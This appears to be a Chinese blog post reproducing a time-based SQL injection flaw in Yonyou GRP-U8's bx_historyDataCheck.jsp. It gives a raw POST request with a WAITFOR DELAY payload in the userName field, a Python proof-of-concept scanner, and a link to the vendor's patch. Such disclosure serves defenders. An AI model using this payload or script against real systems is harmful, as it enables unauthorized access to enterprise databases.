• 用友GRP-U8 SQL注入漏洞复现


    声明
    本文仅用于技术交流,请勿用于非法用途
    由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

    一、产品介绍

            成长型企业平台,以全新URP为平台,应对中型及成长型企业客户群的发展,用友U8为成长型企业提供了互联网应用模式,包括营销服务一体化、完整闭环O2O、供应链协同、设计制造一体化、精益生产、精细管控、人力资源、办公协同、移动应用、大数据分析、社交化协同和云服务,覆盖了企业的全业务。  

    二、漏洞描述

            在用友GRP-U8的bx_historyDataCheck jsp 存在SQL注入漏洞,由于用友GRP-U8未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。本次漏洞主要是对查询语句后拼接的入参注入特定变量值,非法获取数据或对数据库服务器产生影响,存在一定的安全隐患。

    三、影响版本

    用友GRP-U8R10 U8Manager B、C、G 系列产品 < 20230905

    四、漏洞复现

    1.访问漏洞环境

    2.POC (POST)

            POST请求,延时注入

    1. POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
    2. Host: xxxxxxxxxxxx
    3. User-Agent: Go-http-client/1.1
    4. Content-Length: 84
    5. Content-Type: application/x-www-form-urlencoded
    6. Cookie: JSESSIONID=5FF34252A52D49B94A560C18AB894656
    7. Accept-Encoding: gzip
    8. userName=';WAITFOR DELAY '0:0:6'--&class.module.classLoader.DefaultAssertionStatus=

    执行poc

    用python编写一个poc

    1. import re
    2. import requests
    3. url = 'http://替换部分/u8qx/bx_historyDataCheck.jsp'
    4. headers = {
    5. 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0',
    6. 'Accept-Encoding': 'gzip, deflate',
    7. 'Content-Type': 'application/x-www-form-urlencoded',
    8. 'Content-Length': '59',
    9. 'Connection': 'close'
    10. }
    11. data = {
    12. "userName":"1';WAITFOR%20DELAY%20'0:0:6'--+&ysnd=&historyFlag="
    13. }
    14. response = requests.post(url, headers=headers, data=data)
    15. print('Status Code:', response.status_code)
    16. if response.status_code ==200:
    17. print('存在用友GRP-U8 SQL注入漏洞,请尽快修复漏洞!!!')
    18. else:
    19. print('漏洞不存在。')

    运行结果如图

     五、修复建议

    目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

    https://security.yonyou.com/#/patchInfo?foreignKey=77e7e13f32754da9a5be93a9bfbb3f4c
  • 相关阅读:
    一百七十三、Flume——Flume写入HDFS后的诸多小文件问题
    【视觉SLAM】Bags of Binary Words for Fast Place Recognition in Image Sequences
    MATLAB算法实战应用案例精讲-【智能优化算法】禁忌搜索算法(TS)(附MATLAB、Java和Python代码)
    jmeter==docker安装nginx , jmeter压力测试并发20个请求在1秒内发出
    AWS SAA-C03 #108
    ChatGPT王炸升级
    centos 自建网盘 nextcloud
    Codeforces Round 888 (Div. 3)
    马斯克的AI大模型来了,“善于讽刺”
    使用cephadm部署单节点ceph集群,后期可扩容(基于官方文档,靠谱,读起来舒服)
  • 原文地址:https://blog.csdn.net/qq_56698744/article/details/133310341